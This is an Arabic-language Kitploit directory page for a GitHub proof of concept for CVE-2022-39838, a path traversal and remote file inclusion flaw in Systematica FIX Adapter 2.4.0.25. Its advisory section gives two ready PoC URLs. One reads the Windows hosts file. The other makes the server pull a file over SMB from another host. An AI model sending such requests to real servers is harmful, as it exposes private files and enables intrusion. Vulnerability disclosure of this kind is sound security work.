Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-39838 — استغلال إثبات المفهوم لـ CVE-2022-39838 يوضح تضمين الملفات عن بُعد واجتياز المسار المطلق في Systematica FIX Adapter (ALFAFX) 2.4.0.25 عبر طلبات HTTP. | Kitploit
أدوات/GitHubGitHub/jet-pentest/cve-2022-39838
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubjet-pentest/cve-2022-39838

CVE-2022-39838

استغلال إثبات المفهوم لـ CVE-2022-39838 يوضح تضمين الملفات عن بُعد واجتياز المسار المطلق في Systematica FIX Adapter (ALFAFX) 2.4.0.25 عبر طلبات HTTP.

عرض المستودع
12منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-39838

[الوصف المقترح]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 يسمح بتضمين ملفات عن بُعد عبر اسم مسار مشاركة UNC، كما يسمح بعبور المسار المطلق إلى مسارات محلية.

[معلومات إضافية]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[نوع الثغرة]

التحكم غير الصحيح في الوصول

[بائع المنتج]

Systematica

[قاعدة رمز المنتج المتأثر]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[نوع الهجوم]

عن بُعد

[الأثر: كشف المعلومات]

صحيح

[متجهات الهجوم]

يمكن للمستخدم عن بُعد الوصول إلى أي ملف في نظام التشغيل عبر مسار مطلق. كما يمكن للمستخدم عن بُعد إجبار الخادم الضعيف على طلب ملف من جهاز آخر عبر smb.

[مكتشف الثغرة]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[المرجع]

http://systematicalpha.com/company

تنزيل الأداة